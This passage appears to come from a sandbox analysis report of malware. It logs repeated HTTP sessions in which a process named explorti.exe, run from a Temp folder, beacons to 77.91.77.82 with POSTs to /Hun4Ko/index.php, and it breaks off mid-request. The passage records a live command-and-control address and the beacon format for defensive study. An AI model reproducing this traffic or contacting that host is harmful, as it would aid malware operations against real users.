                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:19.648850918 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    15 | 192.168.2.4 | 49752 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:19.769524097 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:20.471168995 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:20.473938942 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:20.691514969 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    16 | 192.168.2.4 | 49753 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:20.816206932 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:21.551939964 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:21.552846909 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:21.780407906 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    17 | 192.168.2.4 | 49754 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:21.894308090 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:22.605396032 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:22.606164932 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:22.831770897 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    18 | 192.168.2.4 | 49755 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:22.941123962 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:23.662369013 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:23.670679092 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:23.896245003 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    19 | 192.168.2.4 | 49756 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:24.003942013 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:24.715133905 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:24.716074944 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:24.936079979 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    20 | 192.168.2.4 | 49757 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:25.052263975 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:25.773075104 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:25.773895025 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:25.999701023 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    21 | 192.168.2.4 | 49758 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:26.113531113 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:26.824183941 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:26.825114012 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:27.052367926 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    22 | 192.168.2.4 | 49759 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:27.159976006 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:27.883590937 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:27.884572983 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:28.108021975 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    23 | 192.168.2.4 | 49760 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:28.223864079 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:28.925721884 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:28.929181099 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:29.146338940 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    24 | 192.168.2.4 | 49761 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:29.254751921 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:29.966687918 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:29.967524052 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:30.189443111 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    25 | 192.168.2.4 | 49762 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:30.301451921 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:31.029006958 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:31.031476021 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:31.258886099 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    26 | 192.168.2.4 | 49763 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:31.378473043 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:32.081392050 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:32.082113028 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:32.302418947 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    27 | 192.168.2.4 | 49764 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:32.410147905 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:33.105979919 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:33.107883930 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:33.325151920 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    28 | 192.168.2.4 | 49765 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:33.441559076 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:34.161181927 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:34.163031101 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:34.385121107 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    29 | 192.168.2.4 | 49766 | 77.91.77.82 | 80 | 8152 | C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 5, 2024 05:10:34.518975973 CEST | 151 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:35.233439922 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:35.234164000 CEST | 303 | OUT | POST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
